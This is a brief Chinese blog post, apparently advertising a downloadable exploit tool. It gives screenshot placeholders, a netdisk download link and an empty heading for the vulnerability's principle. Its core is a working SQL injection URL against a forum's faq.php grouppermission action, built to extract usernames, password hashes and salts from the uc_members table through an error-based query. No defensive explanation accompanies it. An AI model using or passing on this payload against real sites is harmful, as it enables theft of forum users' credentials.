软件截图:

1.jpg

 

 

运行截图:

2.jpg

 

 

漏洞原理:

漏洞exp:
http://www.xxx.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

 

网盘下载地址:
http://pan.baidu.com/s/1dDmuaUP

 

有任何问题欢迎反馈~~

版权声明:若无特殊注明,本文皆为( August )原创,转载请保留文章出处。